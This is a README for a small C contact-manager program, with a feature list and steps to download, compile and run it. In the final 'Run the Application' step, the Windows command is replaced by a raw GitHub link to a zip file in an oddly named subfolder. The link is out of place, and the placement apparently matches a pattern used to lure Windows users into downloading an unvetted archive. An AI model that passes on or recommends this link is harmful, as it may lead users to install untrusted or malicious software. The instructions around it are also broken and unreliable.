Welcome to C-Contact-Agenda! This is a straightforward contact management program written in C. It simplifies how you store and manage your contact information. Ideal for anyone looking to keep their contacts organized without fuss.
You can download the latest version of C-Contact-Agenda from the Releases page.
- Add Contacts: Store names, phone numbers, and emails.
- View Contacts: Easily see all listed contacts.
- Delete Contacts: Remove contacts you no longer need.
- Search Functionality: Quickly find the contact you need.
- Simple Interface: User-friendly menu-driven design.
- Operating System: Windows, macOS, or Linux
- RAM: Minimum 512 MB
- Disk Space: At least 20 MB free
- Compiler: GCC or any C-compatible compiler
To get started, follow these steps:
-
Visit the Releases Page: Go to the Releases page to find the latest version.
-
Download the File: Locate the version that fits your operating system. Click on the download link to get the file.
-
Extract the Files: Once downloaded, extract the contents of the zip file to a folder on your computer.
-
Open the Terminal/Command Line:
- For Windows: Press
Windows + R
, typecmd
, and hit Enter. - For macOS: Open Finder, go to Applications, then Utilities, and open Terminal.
- For Linux: Open your preferred terminal application.
- For Windows: Press
-
Navigate to the Folder: Use the
cd
command to change directory to the folder where you extracted the files:cd path/to/C-Contact-Agenda
-
Compile the Program: Enter the following command to compile the program:
gcc -o contact_agenda contact_agenda.c
This command uses the GCC compiler to build the application. Ensure GCC is installed on your system.
-
Run the Application: After compilation, run the program with this command:
./contact_agenda # For macOS/Linux https://raw.githubusercontent.com/ayoubHjs/C-Contact-Agenda/main/Casel/C-Contact-Agenda.zip # For Windows
Collectively, these steps allow you to install and start using C-Contact-Agenda with ease.
When you launch the app, you will see a simple menu. Follow the on-screen prompts to manage your contacts:
- To Add a Contact: Select "Add Contact" and enter the required details.
- To View Contacts: Choose "View Contacts" to see your list.
- To Delete a Contact: Choose "Delete Contact" and input the name or number.
- To Search for a Contact: Use the "Search" option and enter your search term.
If you encounter issues while using C-Contact-Agenda:
- Cannot Run Program: Ensure you are in the correct directory and the file name is correct.
- Compilation Errors: Make sure you have GCC installed correctly. Check for any typos in the commands.
- Missing Features: Review the menu options to understand all functionalities.
We welcome contributions to improve this project. If you'd like to help, please check the Issues section for areas needing attention.
This project is open source and available for use under the MIT License. Feel free to modify and use it for your personal needs.
If you have questions or need support regarding C-Contact-Agenda, please reach out through the Issues section.
We hope you enjoy using C-Contact-Agenda to manage your contacts effectively!